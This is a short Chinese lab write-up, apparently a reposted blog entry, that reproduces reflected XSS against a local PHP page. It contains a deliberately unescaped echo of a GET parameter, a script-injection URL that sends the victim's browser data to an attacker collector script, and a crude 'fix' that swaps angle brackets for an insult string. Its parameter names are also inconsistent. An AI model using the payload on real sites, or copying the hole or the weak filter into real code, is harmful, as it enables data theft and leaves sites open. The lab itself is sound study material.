反射型 XSS 原理复现

反射型 XSS 复现记录


整个漏洞含有三个实体:

  • 攻击者
  • 受害者
  • 网页服务器:http://192.168.64.2/index.php

制作漏洞

网页服务器代码:

<?php 
    echo $_GET['xss'];
?>

利用漏洞

攻击者漏洞利用流程:

  • 构造含有 XSS 代码的 URL
  • 受害者执行 URL
  • XSS 代码在受害者浏览器上执行,获取信息
  • XSS 代码将获取的信息发送给攻击者

攻击者接收 XSS 代码传来的信息:http://192.168.64.2/hack.php

<?php
	$file = fopen('信息.txt','w');
	fwrite($file,$_GET['info']);
?>

攻击者构建的 URL :

http://192.168.64.2/?xss=
<script> window.location.href='http://192.168.64.2/hack.php?hack=' %2B navigator.platform </script>

受害者访问 URL 之后,信息.txt 的内容

MacIntel

修复漏洞

网页服务器代码:

<?php
    $safe1 = str_replace('>','臭不要脸,黑老子站',$_GET['xss']);
    $safe = str_replace('<','臭不要脸,黑老子站',$safe1);
    echo $safe;
?>
原文地址:https://www.cnblogs.com/shiwai/p/14183649.html